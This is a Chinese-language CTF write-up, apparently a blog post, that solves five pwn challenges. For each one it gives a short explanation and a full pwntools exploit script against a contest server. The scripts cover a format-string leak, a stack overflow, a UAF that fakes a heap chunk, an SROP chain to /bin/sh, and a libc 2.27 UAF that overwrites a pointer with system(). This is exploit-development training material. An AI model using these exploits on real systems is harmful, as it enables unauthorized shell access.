水、水、水。

bank

password是随机的密码,有一定几率第一个字节是\x00,我们也输入\x00就可以进去,然后格式化字符串读。
这里你可以先patch文件进入判断,然后看下格式化字符串怎么构造。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# -*- coding: utf-8 -*
from pwn import *
from ctypes import *

context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('bank2')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./bank2')

else:
p = remote(ip,port)
#gdb.attach(p,"b *0x4014F5")
p.sendlineafter("your account:\n","\x00"*0x30)
payload = "\x00"*0x30+"\n"
p.sendafter("your password:\n",payload)
try:
p.sendlineafter("balance?\n","yes")
payload = "%8$s"
p.sendlineafter("code: \n",payload)
print p.recvline()
pause()
except:
p.close()
if __name__ == '__main__':
while(1):
pwn('81.70.195.166',10000,0)

auto

angr,兄弟们直接冲了,我的垃圾机子直接跑死,还得是好兄弟的高贵的MAC,一下子就尼玛跑起来了,真牛皮。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# -*- coding: utf-8 -*
from angr import *


p = Project("auto",auto_load_libs=False)

state=p.factory.entry_state()

sm=p.factory.simulation_manager(state)

res=sm.explore(find=0x80486C5 ,avoid=0x804875E)

print len(res.found)
for pp in res.found:
print pp.posix.dumps(0)

跑出来密码就是UXYUKVNZ
里面是个栈溢出,不解释直接淦

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# -*- coding: utf-8 -*
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('auto')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./auto')

else:
p = remote(ip,port)
#gdb.attach(p,"b *0x8048721")
p.sendlineafter("the password: \n","UXYUKVNZ")
p.sendlineafter("password again: \n","deadbeef"+"x"*68+p32(0x8048665))
p.interactive()
if __name__ == '__main__':
pwn('81.70.195.166',10001,0)

paper

UAF,一个选项直接泄露stack地址,一个选项可以改栈上8字节,直接八字节伪造stack的heap头,然后uaf直接冲。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# -*- coding: utf-8 -*
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('paper')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./paper')

else:
p = remote(ip,port)
def add():
p.sendlineafter("choice > ","1")
def free(index):
p.sendlineafter("choice > ","2")
p.sendlineafter("Index:\n",str(index))
def write(index,num):
p.sendlineafter("choice > ","3")
p.sendlineafter("Index:\n",str(index))
p.sendlineafter("word count:\n",str(num))
def show():
p.sendlineafter("choice > ","4")
def disk(num):
p.sendlineafter("choice > ","5")
p.sendlineafter("Which disk?\n",str(num))
def back():
p.sendlineafter("choice > ","6")
show()
p.recvuntil("0x")
stack_addr = int(p.recv(12),16)
print "stack_addr = ",hex(stack_addr)
disk(0x21)
show()
backaddr = stack_addr +8
add()
free(0)
write(0,stack_addr-8)
add()
add()
write(2,0xCCCCCCCC)
#gdb.attach(p,"b *$rebase(0xD23)")
back()
p.interactive()
if __name__ == '__main__':
pwn('81.70.195.166',10003,0)

SMALL

SROP,我他妈直接冲

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# -*- coding: utf-8 -*
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('small')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./small')

else:
p = remote(ip,port)

frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = 0x0402500
frame.rdx = 0x300
frame.rip = 0x40102B
frame.rsp = 0x0402500
frame.rbp = 0x0402500
p.send("a"*0x18+p64(0x40100D)+p64(0x40102B)+str(frame))

p.sendline("a"*14)


frame = SigreturnFrame()
frame.rax = 59
frame.rdi = 0x0402500
frame.rsi = 0
frame.rdx = 0
frame.rip = 0x40102B

p.sendline("\x00"*8+p64(0x040100D)+p64(0x40102B)+str(frame))

p.send("a"*8+"/bin/sh")


p.interactive()
if __name__ == '__main__':
pwn("81.70.195.166", 10002,0)

managebooks

libc2.27的uaf,申请0x500大内存,在modify的时候free掉就会出现libc地址,see出来,然后利用UAF覆盖see的指针就可以。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
# -*- coding: utf-8 -*
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('managebooks')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./managebooks')

else:
p = remote(ip,port)


def creates(s,n,ss,su):
p.sendlineafter(">> ","1")
p.sendlineafter("size: ",str(s))
p.sendlineafter("name: ",n)
p.sendlineafter("size: ",str(ss))
p.sendlineafter("summary: ",su)
def delete(i):
p.sendlineafter(">> ","2")
p.sendlineafter("ID (0-10): ",str(i))
def modify(i,ss,su):
p.sendlineafter(">> ","3")
p.sendlineafter(": ",str(i))
p.sendlineafter("size: ",str(ss))
p.sendafter("summary: ",su)
def see(i):
p.sendlineafter(">> ","4")
p.sendlineafter("ID (0-10): ",str(i))

#gdb.attach(p,"b *0x400DC5")
creates(0x10,"/bin/sh\x00",0x500,"/bin/sh\x00")#0
creates(0x10,"/bin/sh\x00",0x80,"/bin/sh\x00")#1
creates(0x10,"/bin/sh\x00",0x80,"/bin/sh\x00")#2
#-----show
modify(0,0x30,"\x61")
see(0)
addr = u64(p.recv(6).ljust(8,"\x00"))
libc = ELF("libc.so.6")

delete(1)
# ----
creates(0x10,p64(addr-0x3ec061 + libc.symbols["system"]),0x10,"/bin/sh\x00")

see(1)


p.interactive()
if __name__ == '__main__':
pwn('81.70.195.166',10004,0)

总结

难度还是比较简单的,水文章本身没什么收获。